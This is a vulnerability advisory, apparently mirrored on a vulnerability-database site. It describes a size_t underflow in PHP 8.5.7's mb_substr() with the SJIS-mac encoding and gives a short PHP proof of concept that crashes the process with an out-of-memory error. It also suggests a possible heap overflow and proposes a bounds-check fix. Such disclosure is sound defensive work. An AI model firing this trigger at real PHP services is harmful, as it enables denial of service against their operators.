# PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow
**Author:** Khashayar Fereidani
**Disclosure Date:** 2026-06-18
**Advisory:** https://fereidani.com/php-857-mbsubstr-sjis-mac-sizet-underflow
**Contact:** https://fereidani.com/contact
## Description
The `mb_get_substr()` function in `ext/mbstring/mbstring.c`
deliberately skips an early empty return guard for the `SJIS-mac`
encoding when `from >= in_len`. As a result, it falls through to
`mb_get_substr_slow()`, executing `mb_convert_buf_init(&buf, MIN(len,
in_len - from), ...);`. When `from > in_len`, the parameter `in_len -
from` underflows the `size_t` representation, resulting in a vastly
large allocation size (near ~2^64 bytes). This leads to an immediate
Out-Of-Memory (OOM) fatal error. Furthermore, if
`_ZSTR_STRUCT_SIZE(initsize)` wraps past `SIZE_MAX`, it could
potentially allocate a tiny buffer while the structural limit retains
the pseudo-wild value, resulting in a heap buffer overflow when
subsequent codepoints are decoded and written.
## Proof of concept
```php
<?php
/*
* PoC: mb_substr() 'SJIS-mac' size_t underflow
* File: ext/mbstring/mbstring.c mb_get_substr() (~L2129) +
mb_get_substr_slow() (~L2102) *
* mb_get_substr() deliberately skips the early "return empty" guard
for SJIS-mac:
*
* if (len == 0 || (from >= in_len && enc != &mbfl_encoding_sjis_mac)) {
* return zend_empty_string; // <-- sjis_mac bypasses this
when from >= in_len
* }
*
* ... then falls through (sjis_mac is multibyte, not SBCS/WCS2/WCS4) to
* mb_get_substr_slow(), whose first line is:
*
* mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);
*
* With `from > in_len` (bytes), `in_len - from` UNDERFLOWS size_t to ~2^64.
* mb_convert_buf_init does emalloc(_ZSTR_STRUCT_SIZE(initsize)).
*
* Two outcomes, both wrong (correct result is the empty string):
* (A) `from` huge -> initsize ~2^64 -> fatal "Allowed memory size exhausted
* (tried to allocate 18446744073708551644 bytes)". CONFIRMED below.
* (B) `from` only slightly > in_len -> initsize sits just under 2^64 and
* _ZSTR_STRUCT_SIZE(initsize) WRAPS past SIZE_MAX to a tiny allocation,
* while buf->limit = out + initsize stays wild -> a subsequent write of
* decoded codepoints is a HEAP OVERFLOW. (Harder to trigger reliably:
* needs a SJIS-mac input decoding to more codepoints than bytes, i.e.
* from < codepoint_count while from > byte_count. Worth upstream review.)
*/
echo "PHP ", PHP_VERSION, " sjis_mac available: ",
(in_array("SJIS-mac", mb_list_encodings()) ? "yes" : "no"), "\n\n";
/* control: a normal encoding with from > strlen returns "" cleanly */
echo "UTF-8, from=10 > strlen('abc'): -> "; var_dump(@mb_substr("abc",
10, null, "UTF-8"));
/* The bug: SJIS-mac, from >> strlen, length omitted -> underflow -> OOM fatal.
* The "tried to allocate 18...644 bytes" is literally (size_t)(3 - 1000000). */
echo "SJIS-mac, from=1000000 > strlen('abc'):\n";
@mb_substr("abc", 1000000, null, "SJIS-mac");
echo "(if you see this line, the fatal error above was caught/suppressed)\n";
```
## Impact
An attacker could intentionally furnish conditions where `from >
in_len` alongside the 'SJIS-mac' encoding, triggering a `size_t`
underflow. This predictably causes a severe Out-Of-Memory (OOM) fatal
error, culminating in a Denial of Service. Depending on environmental
details, it might hypothetically cause a heap buffer overflow.
## Solution
Adjust the constraints inside `mb_get_substr()` and
`mb_get_substr_slow()` in `ext/mbstring/mbstring.c`. The calculation
`in_len - from` should be adequately bounds-checked to halt
computation or safely cap at zero when `from > in_len`, sidestepping
the underflow when initializing string buffers.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation